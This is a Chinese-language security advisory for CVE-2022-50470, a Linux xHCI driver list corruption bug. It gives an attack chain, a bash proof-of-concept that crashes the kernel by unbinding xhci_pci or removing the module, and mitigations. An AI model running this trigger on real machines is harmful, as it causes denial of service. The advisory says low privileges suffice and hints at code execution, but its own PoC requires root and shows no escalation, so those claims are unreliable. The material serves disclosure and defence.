CVE-2022-50470 Linux内核xHCI驱动列表损坏漏洞

漏洞信息

漏洞编号

CVE-2022-50470

漏洞类型

内存安全/列表损坏/拒绝服务

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel xHCI（eXtensible Host Controller Interface）驱动

漏洞概述

CVE-2022-50470是Linux内核xHCI（可扩展主机控制器接口）驱动中的一个高危内存安全漏洞。该漏洞源于xHCI驱动在释放虚拟设备（virt device）时未能正确将设备端点从带宽列表（bandwidth list）中移除。在正常情况下，端点在被丢弃时会从带宽列表中删除，之后虚拟设备才会被释放。然而，当xHC主机控制器正在关闭或被移除时，相关函数会提前返回以避免与非可访问的主机控制器交互，导致端点无法被干净地从带宽列表中删除。

该漏洞会在解绑xhci-pci模块时触发list_del损坏（list_del corruption）内核崩溃，具体发生在xhci_mem_cleanup()函数尝试从带宽列表中删除已经被释放的端点时。此漏洞仅影响使用软件带宽检查的主机控制器，目前仅有Intel Panther Point PCH（Ivy Bridge）中的xHC控制器受此影响。攻击者利用此漏洞需要本地低权限访问，但一旦成功利用，可导致内核崩溃（拒绝服务），并可能造成权限提升或任意代码执行，严重影响系统的机密性、完整性和可用性。

技术细节

从技术层面分析，该漏洞的核心问题在于xHCI驱动中端点生命周期管理与带宽列表管理的同步缺陷。

在xHCI驱动的正常执行流程中，当虚拟设备的端点被丢弃（drop）时，会先将其从带宽列表（bandwidth list）中移除，然后再释放虚拟设备结构体。这一顺序确保了带宽列表中的指针在端点被释放前已经清理完毕，避免了悬挂指针（dangling pointer）问题。

然而，当xHC主机控制器处于死亡状态（dying）或正在被移除（being removed）时，xhci_free_dev()等关键函数会检测到主机控制器状态异常，并提前返回以避免与不可访问的硬件交互。这种防御性提前返回导致端点未能从带宽列表中正确移除，但虚拟设备的释放流程仍然继续执行。

随后，当xhci_mem_cleanup()函数被调用以清理主机控制器的内存资源时，它会遍历带宽列表并尝试删除其中的端点。由于这些端点已经被释放，list_del操作将访问已释放的内存区域，触发list_del corruption内核崩溃。

该漏洞的利用条件包括：1）系统使用Intel Panther Point PCH（Ivy Bridge）芯片组的xHCI控制器；2）攻击者具有本地低权限访问权限；3）触发条件为解绑xhci-pci驱动（如通过echo命令卸载xhci_pci模块）。攻击者可通过执行modprobe -r xhci_pci等操作触发漏洞，导致系统内核崩溃（拒绝服务攻击），在某些情况下可能进一步利用内存损坏实现权限提升。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要本地低权限访问运行Linux内核的系统，且系统需配备Intel Panther Point PCH（Ivy Bridge）芯片组的xHCI控制器。

STEP 2

步骤2：权限获取

攻击者获取本地系统的低权限shell访问权限（如通过普通用户账户登录或利用其他漏洞提权至可操作PCI设备的权限）。

STEP 3

步骤3：确保端点存在

确保系统中有USB设备连接，使xHCI驱动在带宽列表中分配端点条目，为漏洞触发创造条件。

STEP 4

步骤4：触发漏洞

通过写入/sys/bus/pci/drivers/xhci_pci/unbind或执行modprobe -r xhci_pci，触发xHCI驱动清理流程，导致list_del corruption内核崩溃。

STEP 5

步骤5：利用后果

内核崩溃导致系统拒绝服务（蓝屏/重启），在特定条件下可利用内存损坏进一步实现权限提升，执行任意内核代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50470 PoC - Trigger list_del corruption in xHCI driver
# Affected: Linux kernel with Intel Panther Point PCH (Ivy Bridge) xHCI
# This PoC triggers the vulnerability by unbinding xhci-pci driver
# while endpoints are still on the bandwidth list.

#!/bin/bash

# Check if running as root (required for driver manipulation)
if [ "$EUID" -ne 0 ]; then
    echo "This PoC requires root privileges"
    exit 1
fi

# Step 1: Verify Intel Panther Point PCH (Ivy Bridge) xHCI controller
# Check for the specific Intel xHCI device (PCI ID 8086:1e31)
echo "[*] Checking for Intel Panther Point PCH xHCI controller..."
if lspci | grep -q "1e31"; then
    echo "[+] Vulnerable xHCI controller detected"
else
    echo "[-] Vulnerable controller not found, this may not work"
fi

# Step 2: Ensure there are USB devices connected to trigger endpoint allocation
# The vulnerability requires endpoints to be on the bandwidth list
echo "[*] Ensure USB devices are connected to allocate bandwidth endpoints"
lsusb

# Step 3: Unbind xhci-pci to trigger the vulnerability
# This will cause xhci_mem_cleanup() to attempt deleting freed endpoints
echo "[*] Triggering vulnerability by unbinding xhci-pci..."
echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/unbind 2>/dev/null

if [ $? -eq 0 ]; then
    echo "[+] xhci-pci unbound successfully"
    echo "[*] Check dmesg for list_del corruption crash"
    dmesg | tail -20
else
    echo "[-] Failed to unbind, trying alternative method..."
    # Alternative: use modprobe to remove the module
    modprobe -r xhci_pci 2>/dev/null
    if [ $? -eq 0 ]; then
        echo "[+] xhci_pci module removed"
    else
        echo "[-] Module removal failed - module may be in use"
    fi
fi

# Step 4: Rebind to restore functionality (if system survives)
sleep 2
echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/bind 2>/dev/null
echo "[*] PoC execution completed"

影响范围

Linux Kernel < 5.4.232

Linux Kernel 5.5.x - 5.10.x（需根据具体补丁版本确认）

Linux Kernel 5.15.x - 5.19.x（需根据具体补丁版本确认）

Linux Kernel 6.0.x+（需根据具体补丁版本确认）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制对/sys/bus/pci/drivers/xhci_pci/unbind等PCI设备管理接口的访问权限，仅允许root用户操作；2）通过内核启动参数或sysctl限制非特权用户加载/卸载内核模块；3）使用SELinux或AppArmor等强制访问控制机制限制对PCI子系统管理的访问；4）监控dmesg日志，及时发现list_del corruption等内核异常事件；5）如非必要，可在内核配置中禁用xhci_pci模块的自动加载。